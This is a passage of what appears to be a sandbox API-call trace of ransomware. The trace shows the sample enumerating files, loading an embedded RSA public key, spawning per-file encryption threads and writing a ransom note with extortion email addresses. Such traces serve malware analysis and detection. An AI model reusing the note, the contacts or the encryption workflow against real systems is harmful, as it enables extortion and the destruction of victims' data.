HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.527] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0039.528] Sleep (dwMilliseconds=0x96) [0039.683] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0039.683] lstrcmpW (lpString1="KtwKDD9P56tzPTxgwQR.ods", lpString2="..") returned 1 [0039.683] lstrcmpW (lpString1="KtwKDD9P56tzPTxgwQR.ods", lpString2=".") returned 1 [0039.683] StrStrW (lpFirst="KtwKDD9P56tzPTxgwQR.ods", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0039.683] StrStrW (lpFirst="KtwKDD9P56tzPTxgwQR.ods", lpSrch="ntldr") returned 0x0 [0039.683] StrStrW (lpFirst="KtwKDD9P56tzPTxgwQR.ods", lpSrch="NTLDR") returned 0x0 [0039.683] StrStrW (lpFirst="KtwKDD9P56tzPTxgwQR.ods", lpSrch="NTDETECT.COM") returned 0x0 [0039.683] StrStrW (lpFirst="KtwKDD9P56tzPTxgwQR.ods", lpSrch="ntdetect.com") returned 0x0 [0039.683] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0039.683] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0039.683] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0039.684] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0039.684] lstrcpyW (in: lpString1=0x17be7c, lpString2="KtwKDD9P56tzPTxgwQR.ods" | out: lpString1="KtwKDD9P56tzPTxgwQR.ods") returned="KtwKDD9P56tzPTxgwQR.ods" [0039.684] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.684] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x460 [0039.684] Sleep (dwMilliseconds=0x96) [0039.869] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0039.869] lstrcmpW (lpString1="mPKKZqdrZkc7.pdf", lpString2="..") returned 1 [0039.869] lstrcmpW (lpString1="mPKKZqdrZkc7.pdf", lpString2=".") returned 1 [0039.869] StrStrW (lpFirst="mPKKZqdrZkc7.pdf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0039.870] StrStrW (lpFirst="mPKKZqdrZkc7.pdf", lpSrch="ntldr") returned 0x0 [0039.870] StrStrW (lpFirst="mPKKZqdrZkc7.pdf", lpSrch="NTLDR") returned 0x0 [0039.870] StrStrW (lpFirst="mPKKZqdrZkc7.pdf", lpSrch="NTDETECT.COM") returned 0x0 [0039.870] StrStrW (lpFirst="mPKKZqdrZkc7.pdf", lpSrch="ntdetect.com") returned 0x0 [0039.870] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0039.870] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0039.870] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0039.870] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0039.870] lstrcpyW (in: lpString1=0x17be7c, lpString2="mPKKZqdrZkc7.pdf" | out: lpString1="mPKKZqdrZkc7.pdf") returned="mPKKZqdrZkc7.pdf" [0039.870] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.870] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x494 [0039.870] Sleep (dwMilliseconds=0x96) [0040.048] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.048] lstrcmpW (lpString1="NMqv0Yc9MO55X.xls", lpString2="..") returned 1 [0040.048] lstrcmpW (lpString1="NMqv0Yc9MO55X.xls", lpString2=".") returned 1 [0040.049] StrStrW (lpFirst="NMqv0Yc9MO55X.xls", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0040.049] StrStrW (lpFirst="NMqv0Yc9MO55X.xls", lpSrch="ntldr") returned 0x0 [0040.049] StrStrW (lpFirst="NMqv0Yc9MO55X.xls", lpSrch="NTLDR") returned 0x0 [0040.049] StrStrW (lpFirst="NMqv0Yc9MO55X.xls", lpSrch="NTDETECT.COM") returned 0x0 [0040.049] StrStrW (lpFirst="NMqv0Yc9MO55X.xls", lpSrch="ntdetect.com") returned 0x0 [0040.049] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0040.049] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0040.049] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0040.049] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0040.049] lstrcpyW (in: lpString1=0x17be7c, lpString2="NMqv0Yc9MO55X.xls" | out: lpString1="NMqv0Yc9MO55X.xls") returned="NMqv0Yc9MO55X.xls" [0040.049] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0040.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x48c [0040.049] Sleep (dwMilliseconds=0x96) [0040.275] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.275] lstrcmpW (lpString1="QRg3dKar.odp", lpString2="..") returned 1 [0040.275] lstrcmpW (lpString1="QRg3dKar.odp", lpString2=".") returned 1 [0040.275] StrStrW (lpFirst="QRg3dKar.odp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0040.275] StrStrW (lpFirst="QRg3dKar.odp", lpSrch="ntldr") returned 0x0 [0040.275] StrStrW (lpFirst="QRg3dKar.odp", lpSrch="NTLDR") returned 0x0 [0040.275] StrStrW (lpFirst="QRg3dKar.odp", lpSrch="NTDETECT.COM") returned 0x0 [0040.275] StrStrW (lpFirst="QRg3dKar.odp", lpSrch="ntdetect.com") returned 0x0 [0040.275] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0040.275] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0040.275] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0040.275] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0040.275] lstrcpyW (in: lpString1=0x17be7c, lpString2="QRg3dKar.odp" | out: lpString1="QRg3dKar.odp") returned="QRg3dKar.odp" [0040.275] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0040.275] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x478 [0040.276] Sleep (dwMilliseconds=0x96) [0040.478] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.478] lstrcmpW (lpString1="vqWzW8a_K.doc", lpString2="..") returned 1 [0040.478] lstrcmpW (lpString1="vqWzW8a_K.doc", lpString2=".") returned 1 [0040.478] StrStrW (lpFirst="vqWzW8a_K.doc", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0040.478] StrStrW (lpFirst="vqWzW8a_K.doc", lpSrch="ntldr") returned 0x0 [0040.478] StrStrW (lpFirst="vqWzW8a_K.doc", lpSrch="NTLDR") returned 0x0 [0040.478] StrStrW (lpFirst="vqWzW8a_K.doc", lpSrch="NTDETECT.COM") returned 0x0 [0040.478] StrStrW (lpFirst="vqWzW8a_K.doc", lpSrch="ntdetect.com") returned 0x0 [0040.478] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0040.478] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0040.478] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0040.478] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0040.478] lstrcpyW (in: lpString1=0x17be7c, lpString2="vqWzW8a_K.doc" | out: lpString1="vqWzW8a_K.doc") returned="vqWzW8a_K.doc" [0040.478] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0040.478] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x498 [0040.479] Sleep (dwMilliseconds=0x96) [0040.720] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.721] lstrcmpW (lpString1="YYzgnphG.csv", lpString2="..") returned 1 [0040.721] lstrcmpW (lpString1="YYzgnphG.csv", lpString2=".") returned 1 [0040.721] StrStrW (lpFirst="YYzgnphG.csv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0040.721] StrStrW (lpFirst="YYzgnphG.csv", lpSrch="ntldr") returned 0x0 [0040.721] StrStrW (lpFirst="YYzgnphG.csv", lpSrch="NTLDR") returned 0x0 [0040.721] StrStrW (lpFirst="YYzgnphG.csv", lpSrch="NTDETECT.COM") returned 0x0 [0040.721] StrStrW (lpFirst="YYzgnphG.csv", lpSrch="ntdetect.com") returned 0x0 [0040.721] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0040.721] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0040.721] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0040.721] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0040.721] lstrcpyW (in: lpString1=0x17be7c, lpString2="YYzgnphG.csv" | out: lpString1="YYzgnphG.csv") returned="YYzgnphG.csv" [0040.721] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0040.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x480 [0040.721] Sleep (dwMilliseconds=0x96) [0040.946] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0040.946] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0040.946] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 1 [0040.946] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 0 [0040.947] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0040.947] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*" [0040.947] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0040.947] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0040.947] SetErrorMode (uMode=0x1) returned 0x1 [0040.947] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\_HELP_INSTRUCTION.TXT") returned 82 [0040.947] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0040.947] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0040.947] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x49c) returned 0x0 [0040.947] RegQueryValueExW (in: hKey=0x49c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e114c8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3e114c8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0040.947] RegCloseKey (hKey=0x49c) returned 0x0 [0040.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0040.947] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0040.947] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0040.948] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0040.949] WriteFile (in: hFile=0x49c, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0040.949] CloseHandle (hObject=0x49c) returned 1 [0040.950] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x42e4f90 [0040.950] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0040.950] lstrcpyW (in: lpString1=0x17b644, lpString2="lhhNd9leW5xmlXw00JFa" | out: 